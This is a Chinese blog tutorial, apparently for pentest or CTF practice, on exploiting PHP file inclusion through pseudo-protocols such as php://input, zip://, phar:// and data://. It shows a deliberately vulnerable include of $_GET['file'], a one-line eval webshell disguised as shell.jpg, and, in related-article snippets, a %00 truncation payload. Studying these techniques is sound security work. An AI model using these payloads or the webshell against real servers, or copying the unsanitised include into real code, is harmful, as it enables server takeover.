PHP伪协议-文件包含

最新推荐文章于 2024-04-22 14:07:29 发布
最新推荐文章于 2024-04-22 14:07:29 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: 文件包含 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43626025/article/details/122136727
版权

lfi.php案例代码

<?php
	include $_GET['file'];
?>

phar://、zip://、zlib://

  用于读取压缩文件,zip:// 、phart:// 、zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀: jpg、png、gif、xxx等等。


php://input

  php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。
注:当enctype="multipart/form-data",php://input 是无效的。
请添加图片描述

zip://

  如果不允许上传zip格式文件,可修改后缀为图片格式,phar协议和zip协议会无视利用的是什么包。
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名] (#编码为%23)
请添加图片描述
请添加图片描述

phar://
# shell.jpg
<?php @eval($_REQUEST[1]);?>

请添加图片描述

compress.zlib://

请添加图片描述
  如果是zip压缩包,后面不需要跟子文件
请添加图片描述
请添加图片描述

data://text/plain

请添加图片描述
请添加图片描述

s1y1n9aI
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计音频文件.zip
11-02
目录:网盘文件永久链接 任务27:漏洞实战之越权漏洞mp4 任务26:漏润实战之任意文件删除漏洞mp4 任务25:漏洞实战之任意文件写入漏洞mp4 任务24:漏洞实战之CSRF漏洞mp4 任努23:漏洞实战之代码执行漏洞mp4 任务22:漏洞实战之存储型 XSS. mp4 任务21:漏洞实战之系统SQL注入漏洞mp4 任努20:漏洞实战之系统重装漏洞mp4 任务19:PHP代码审计之会话认证漏洞mp4 任努18:PHP伪协议mp4 任务17:PHP弱类型mp4 任务16:PHP代码审计之反序列化漏润mp4 任务15:PHP代码审计之变量盖漏洞mp4 任务14PHP代码审计之任意文件读取及删除漏洞mp4 任务13:PHP代码审计之目录穿越及文件包含漏洞mp4 任务12:PHP代码审计之文件上传漏洞mp4 任务11:代码审计之CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码审计之命令执行漏洞mp4 任务8:代码审计之代码执行漏洞mp4 任务7:PHP代码审计宽字节注入及二次注入mp4 任务6:PHP代码审计SQL注入漏洞mp4 任务5:审计涉及的超全局变量mp4 任务4:代码调试及 Xdebug的配置使用mp4 任务3:PHP核心配置详解mp4 任务2:代码审计的思路及流程mp4 任务1:环境配置及审计工具介绍mp4
php使用glob函数遍历文件和目录详解
12-19
php glob()函数返回匹配指定模式的文件名或目录。因此我们可以使用glob函数来查找文件,也可以实现目录的遍历。 函数说明:array glob ( string $pattern [, int $flags ] ) 功能:寻找与模式匹配的文件路径,返回包含匹配文件(目录)的数组(注:被检查的文件必须是服务器系统的,不能用于远程文件) 参数说明:第一个参数:匹配模式;第二个可选参数: GLOB_MARK – 在每个返回的项目中加一个斜线 GLOB_NOSORT – 按照文件在目录中出现的原始顺序返回(不排序) GLOB_NOCHECK – 如果没有文件匹配则返回用于搜索的模式
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
文件包含之——phar伪协议
abc18964814133的博客
05-09 5957
文件上传之phar伪协议
phar文件上传的骚姿势(绕过phar、_HALT)
qq_62046696的博客
10-07 1450
前面也讲过一次phar文件上传的东西,但是那都是过滤比较低,仅仅过滤了后缀。知道今天看到了一篇好的文章。
文件包含漏洞
qq_52016943的博客
08-17 2220
文件包含漏洞
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 856
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
文件包含漏洞& 文件伪协议利用
cike_y
09-11 1593
可能你会问,为什么不是php后缀名而是txt格式,因为我尝试过了,如果是使用的是php格式,那么服务端访问的时候不仅不需要解析,而且只是单纯的访问我的php代码,执行的是我自己的脚本,而不是服务器。就有题目所说是远程包含漏洞,我也懒得测试了,可以发现输入百度链接的时候直接跳转,那么我们可以尝试构造一句话木马搭建在本地的服务,让文件包含解析到攻击者的文本文件而成功的触发到让脚本代码得到解析。我在测试的时候忘记了自己的网站服务是搭建在D盘里,而我的文件是在E盘所以我以为是我的文件包含代码写错了。
PHP代码审计笔记--文件包含漏洞
11-06 404
有限制的本地文件包含: &lt;?php include($_GET['file'].".php"); ?&gt; %00截断: ?file=C://Windows//win.ini%00 (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29...
PHP 魔术常量 一句话制作木马$_GET $_POST include命令
m0_64338210的博客
12-06 1050
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
PHP内置伪协议利用。 PHP文件包含函数有以下样式: 要求() require_once() 包括() include_once() include和require区别主要是,include在包含的过程中如果出现错误,会引发一个警告,程序继续正常...
4-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
02-24
php伪协议简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供...
php include包含get参数_DC5 文件包含靶机
weixin_39631350的博客
12-21 519
首先靶机的搭建很简单,就是导入到VM虚拟机,接着需要探测出来它的IP地址出来。获取靶机IP地址之后呢就可以对它进行端口扫描masscan -p1-65535 172.16.25.237 --rate=10000接着使用nmap对扫描出来的端口进行详细的信息探测,这里80端口是WEB端口,并且扫描出来了标题,111是rpc的端口,暂时对80端口进行渗透nmap -A -sS -v -p...
php文件包含 伪协议
m0_64361111的博客
02-28 1001
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 580
PHP伪协议
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 2853
渗透测试-文件包含漏洞以及php伪协议的应用
【CTF题】使用文件包含漏洞读取网页代码
热门推荐
keysking瞎写东西的地方
01-25 2万+
【CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
php伪协议
weixin_60719780的博客
01-27 3863
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
最新发布
ALex_zry的博客
04-22 470
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
文件包含-伪协议filter
08-22
通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值